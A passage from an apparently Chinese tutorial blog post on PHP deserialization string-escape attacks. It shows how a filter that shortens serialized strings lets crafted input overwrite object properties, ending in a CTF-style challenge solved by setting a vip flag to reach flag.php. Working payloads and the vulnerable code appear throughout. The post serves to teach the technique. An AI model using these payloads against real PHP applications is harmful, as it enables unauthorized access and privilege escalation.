id=\"ue1e32fb8\">\u5176\u4e2d\u7684\u957f\u5ea6\u4e0d\u4f1a\u6539\u53d8\uff0cstr_replace\u628a$v1\u7684system() \u5168\u53d8\u6ca1\u4e86\uff0c\u817e\u51fa\u4e86\u7a7a\u95f4\uff0c\u90a3\u4e48\u5c31\u4f1a\u9020\u6210\u7ee7\u7eed\u5f80\u540e\u89e3\u6790\uff0c\u53cd\u5e8f\u5217\u5316\u65f6\uff0c$v1\u4e3a\u4e86\u51d1\u591f\u539f\u672c\u7684\u5b57\u7b26\uff0c\u53ea\u80fd\u628a\u539f\u672c\u5c5e\u4e8e\u95f4\u9694\u7b26\u3001$v2\u7684\u5c5e\u6027\u540d\u3001\u751a\u81f3$v2\u7684\u957f\u5ea6\u58f0\u660e\u90fd\u5403\u6389\u5f53\u4f5c\u666e\u901a\u5b57\u7b26\u4e32<\/p>\n\n\n\n<p id=\"u01a04b37\">\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u8fd9\u4e00\u7279\u70b9\uff0c$v1\u5403\u6389\u539f\u672c\u7684\u7ed3\u6784\u540e\uff0c\u6211\u4eec\u7d27\u63a5\u7740\u5728$v2\u7684\u5f00\u5934\u6784\u9020\u4e00\u4e2a\u65b0\u7684\u7ed3\u6784\u4ee3\u7801\uff0c\u8986\u76d6\u6389\u539f\u672c\u7684$v2\uff0cPHP\u5c31\u4f1a\u628a\u6211\u4eec\u7684\u6076\u610f\u4ee3\u7801\u5f53\u4f5c\u5408\u6cd5\u7684\u7ed3\u6784\u53bb\u89e3\u6790<\/p>\n\n\n\n<p id=\"ub79009d6\">\u4f8b\u5982\u6211\u4eec\u91cd\u65b0\u5199\u4e00\u4e2a$v2\u7684\u503c<\/p>\n\n\n\n<pre id=\"wAmqb\" class=\"wp-block-code\"><code>;s:2:\"v2\";s:6:\"hacked\";}<\/code><\/pre>\n\n\n\n<p id=\"u16aa6416\">\u5f00\u5934\u7684 ; \u662f\u4e3a\u4e86\u95ed\u5408 $v1\uff0c\u524d\u9762\u63d0\u5230\u8fc7php\u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u5e95\u5c42\u4ee3\u7801\u662f\u4ee5;\u4f5c\u4e3a\u5b57\u6bb5\u7684\u5206\u9694<\/p>\n\n\n\n<p id=\"ub8cb548d\">s:2:&quot;v2&quot;;s:6:&quot;hacked&quot;; \u662f\u6211\u4eec\u8981\u8986\u76d6\u7684\u65b0\u5c5e\u6027\u548c\u503c<\/p>\n\n\n\n<p id=\"u3d31a261\">} 
\u95ed\u5408\u6574\u4e2a\u5bf9\u8c61\uff0c\u4e22\u5f03\u540e\u9762\u539f\u672c\u7684\u5783\u573e\u6570\u636e<\/p>\n\n\n\n<p id=\"ubec7a00b\">\u8fd9\u4e2a Payload \u7684\u957f\u5ea6\u662f 24 \u4e2a\u5b57\u7b26<\/p>\n\n\n\n<p id=\"ua91cb7c5\">\u5728\u6b63\u5e38\u5e8f\u5217\u5316\u4e2d\uff0c$v1 \u548c $v2 \u4e4b\u95f4\u5939\u7740\u4e00\u6bb5\u56fa\u5b9a\u7684\u7ed3\u6784\u4ee3\u7801\uff1a<\/p>\n\n\n\n<pre id=\"MIoT4\" class=\"wp-block-code\"><code>...s:N:\"&#91;v1\u7684\u5185\u5bb9]\"; s:2:\"v2\";s:XX:\" &#91;v2\u7684\u5185\u5bb9]...<\/code><\/pre>\n\n\n\n<p id=\"uc7aed6cf\">\u6211\u4eec\u8981\u8ba9 $v1 \u5403\u6389\u7684\u90e8\u5206\u5c31\u662f\u8fd9\u6bb5\uff1a &quot;;s:2:&quot;v2&quot;;s:XX:&quot;<\/p>\n\n\n\n<p id=\"uf29c946a\">\u56e0\u4e3a\u6211\u4eec\u7684v2 payload\u957f\u5ea6\u662f24\u4e2a\u5b57\u7b26\u6240\u4ee5\u4e2d\u95f4\u8fd9\u4e00\u6bb5\u5c31\u662f &quot;;s:2:&quot;v2&quot;;s:24:&quot;<\/p>\n\n\n\n<p id=\"u03c2bbcb\">\u6570\u4e00\u6570\u957f\u5ea6\uff1a&quot;;s:2:&quot;v2&quot;;s:24:&quot; \u5171\u6709 16 \u4e2a\u5b57\u7b26\uff08\u4e0d\u8ba1\u6700\u540e\u4e00\u4e2a &quot;\uff1a\u5b83\u539f\u672c\u662f $v2 \u503c\u7684\u8d77\u59cb\u5f15\u53f7\uff0c$v1 \u8bfb\u6ee1 16 \u4e2a\u5b57\u7b26\u540e\u4f1a\u628a\u5b83\u5f53\u4f5c\u81ea\u5df1\u7684\u7ed3\u675f\u5f15\u53f7\uff09<\/p>\n\n\n\n<p id=\"u06e5b396\">\u6211\u4eec\u6765\u770b\u5230\u8fd9\u6bb5\u4ee3\u7801<\/p>\n\n\n\n<pre id=\"HXDWs\" class=\"wp-block-code\"><code>$data = str_replace(\"system()\",\"\",$data);<\/code><\/pre>\n\n\n\n<p id=\"u3bfd3bc0\">system()\u4e00\u5171\u662f\u516b\u4e2a\u5b57\u7b26\uff0c\u88ab\u66ff\u6362\u4e3a\u7a7a\uff0c\u4e5f\u5c31\u662f\u8bf4\u4e00\u4e2asystem()\u4f1a\u5403\u6389\u516b\u4e2a\u5b57\u7b26<\/p>\n\n\n\n<p id=\"u5e93a598\">\u6211\u4eec\u9700\u8981\u4e24\u4e2asystem()<\/p>\n\n\n\n<p id=\"u7db01acf\">\u6784\u9020payload<\/p>\n\n\n\n<pre id=\"TtSLW\" class=\"wp-block-code\"><code>$a = 'system()system()';\n$b = ';s:2:\"v2\";s:6:\"hacked\";}';<\/code><\/pre>\n\n\n\n<p id=\"u4fad40fb\">\u6211\u4eec\u8c03\u8bd5\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-60-1024x171.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"171\" data-attachment-id=\"90\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=90\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-60.png\" data-orig-size=\"1830,305\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-60-300x50.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-60-1024x171.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-60-1024x171.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-90\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u90be4316\">\u521a\u521a\u4f20\u5165\u7684\u65f6\u5019\uff0cdata\u7684\u503c\u662f<\/p>\n\n\n\n<pre id=\"jNUe4\" class=\"wp-block-code\"><code>O:1:\"A\":2:{s:2:\"v1\";s:16:\"system()system()\";s:2:\"v2\";s:24:\";s:2:\"v2\";s:6:\"hacked\";}\";}<\/code><\/pre>\n\n\n\n<p 
id=\"u13975588\">\u7ee7\u7eed\u6b65\u5165<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-61-1024x475.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"475\" data-attachment-id=\"91\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=91\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-61.png\" data-orig-size=\"1878,871\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-61-300x139.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-61-1024x475.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-61-1024x475.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-91\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p 
id=\"u60611db4\">\u8fd9\u4e2a\u65f6\u5019system()\u5df2\u7ecf\u88ab\u66ff\u6362\u4e3a\u7a7a\u4e86\uff0cdata\u7684\u503c\u662f<\/p>\n\n\n\n<pre id=\"lNMWL\" class=\"wp-block-code\"><code>O:1:\"A\":2:{s:2:\"v1\";s:16:\"\";s:2:\"v2\";s:24:\";s:2:\"v2\";s:6:\"hacked\";}\";}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-62-1024x81.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"81\" data-attachment-id=\"92\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=92\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-62.png\" data-orig-size=\"1079,85\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-62-300x24.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-62-1024x81.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-62-1024x81.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-92\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u44e97f15\">system()\u6ca1\u4e86\uff0cs:16\u4f1a\u7ee7\u7eed\u5f80\u540e\u540316\u4e2a\u5b57\u7b26\uff0c\u4e4b\u524d\u7684v2\u5c31\u88ab\u5403\u6389\u4f5c\u4e3av1\u7684\u503c\u4e86<\/p>\n\n\n\n<p id=\"u4c310b76\">\u6267\u884c\u7ed3\u679c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-63.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"483\" height=\"190\" data-attachment-id=\"93\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=93\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-63.png\" data-orig-size=\"483,190\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-63-300x118.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-63.png\" 
data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-63.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-93\"  sizes=\"auto, (max-width: 483px) 100vw, 483px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ucc7fb1f9\">\u53ef\u4ee5\u770b\u5230$v2\u7684\u503c\u5df2\u7ecf\u88ab\u66ff\u6362\u6210\u4e86\u6211\u4eec\u60f3\u8981\u7684\u503c<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"c7ILm\">\u4f8b\u9898<\/h5>\n\n\n\n<p id=\"u830708a6\">\u6211\u4eec\u6765\u770b\u4e00\u9053\u4f8b\u9898<\/p>\n\n\n\n<pre id=\"HRpEA\" class=\"wp-block-code\"><code>&lt;?php\nhighlight_file(__FILE__);\nerror_reporting(0);\nfunction filter($name){\n    $safe=array(\"flag\",\"php\");\n    $name=str_replace($safe,\"hk\",$name);\n    return $name;\n}\nclass test{\n    var $user;\n    var $pass;\n    var $vip = false ;\n    function __construct($user,$pass){\n        $this-&gt;user=$user;\n    $this-&gt;pass=$pass;\n    }\n}\n$param=$_GET&#91;'user'];\n$pass=$_GET&#91;'pass'];\n$param=serialize(new test($param,$pass));\n$profile=unserialize(filter($param));\n\nif ($profile-&gt;vip){\n    echo file_get_contents(\"flag.php\");\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p id=\"u16128dcf\">\u8fd9\u9053\u9898\u4f1a\u5c06user\u548cpass\u4e2d\u7684php\u8fd8\u6709flag\u66ff\u6362\u6210hk\uff0c\u5bf9\u4e8ephp\u800c\u8a00\u51cf\u5c11\u4e86\u4e00\u4e2a\u5b57\u7b26\uff0c\u5bf9\u4e8eflag\u800c\u8a00\u51cf\u5c11\u4e86\u4e24\u4e2a\u5b57\u7b26<\/p>\n\n\n\n<p id=\"ud9a4ac16\">\u6211\u4eec\u9700\u8981\u8ba9 $profile-&gt;vip \u4e3a true\uff0c\u4f46\u662f\u7c7b\u5b9a\u4e49\u4e2d $vip \u9ed8\u8ba4\u4e3a false\uff0c\u4e14\u6784\u9020\u51fd\u6570\u53ea\u5141\u8bb8\u6211\u4eec\u8d4b\u503c $user \u548c $pass<\/p>\n\n\n\n<p 
id=\"u93e1f9c6\">\u90a3\u4e48\u6211\u4eec\u9700\u8981\u6784\u9020\u4e00\u6bb5\u4ee3\u7801\uff0c\u8fd9\u6bb5\u4ee3\u7801\u5728\u88ab\u89e3\u6790\u65f6\uff0c\u4f1a\u5c06 vip \u8bbe\u4e3a true\u3002 \u56e0\u4e3a\u6211\u4eec\u6253\u7b97\u8ba9 $user \u5403\u6389\u4e2d\u95f4\u7684\u95f4\u9694\uff0c\u6240\u4ee5 $pass \u7684\u5f00\u5934\u5fc5\u987b\u914d\u5408\u95ed\u5408<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-64-1024x476.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"476\" data-attachment-id=\"94\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=94\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-64.png\" data-orig-size=\"1528,710\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-64-300x139.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-64-1024x476.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-64-1024x476.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-94\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u86d57dfe\">\u5148\u5927\u81f4\u770b\u4e00\u773c\u8fd9\u9053\u9898\u7684\u53cd\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u7ed3\u6784<\/p>\n\n\n\n<p id=\"u76ddd71f\">\u6211\u4eec\u8981\u5403\u6389\u7684\u90e8\u5206\u662f\uff1a&quot;;s:4:&quot;pass&quot;;s:19:&quot; 19\u4e2a\u5b57\u7b26\u4e5f\u5c31\u662f19\u4e2aphp<\/p>\n\n\n\n<p id=\"ufaec95d2\">\u8f93\u51faflag\u7684\u6761\u4ef6\u662f$profile-&gt;vip\u4e3atrue<\/p>\n\n\n\n<p id=\"u9a246b63\">\u53ef\u4ee5\u6784\u9020payload<\/p>\n\n\n\n<pre id=\"upJfw\" class=\"wp-block-code\"><code>\";s:3:\"vip\";b:1;s:4:\"pass\";s:3:\"666\";}<\/code><\/pre>\n\n\n\n<p id=\"u1eb1040c\">\u8fd9\u91cc\u8865\u5145\u4e86\u4e00\u4e2as:4\u662f\u56e0\u4e3a\u5e8f\u5217\u5316\u5934\u662f\u8fd9\u6837\u751f\u6210\u7684:O:4:&quot;test&quot;:3:{&#8230;} \u8fd9\u91cc\u7684:3: \u662f\u4e00\u4e2a\u6b7b\u547d\u4ee4\uff0c\u610f\u5473\u7740\u201c\u5728\u8fd9\u4e2a\u5927\u62ec\u53f7 {} \u91cc,\u5fc5\u987b\u5305\u542b3\u4e2a\u5c5e\u6027\u201d<\/p>\n\n\n\n<p id=\"u6d685b07\">\u4f20\u5165\u540e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-65-1024x415.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"415\" data-attachment-id=\"95\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=95\" 
data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-65.png\" data-orig-size=\"1880,761\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-65-300x121.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-65-1024x415.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-65-1024x415.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-95\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u7e064e61\">\u5b57\u7b26\u88ab\u66ff\u6362\u6389\u4ee5\u540e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-66-1024x446.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"446\" data-attachment-id=\"96\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=96\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-66.png\" 
data-orig-size=\"1914,833\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-66-300x131.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-66-1024x446.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-66-1024x446.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-96\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uc31c3ecc\">vip\u72b6\u6001<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-67-1024x510.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"510\" data-attachment-id=\"97\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=97\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-67.png\" data-orig-size=\"1919,955\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-67-300x149.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-67-1024x510.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-67-1024x510.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-97\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uf94d13b6\">\u6210\u529f\u6267\u884cif ($profile-&gt;vip){\u540e\u9762\u7684\u4ee3\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 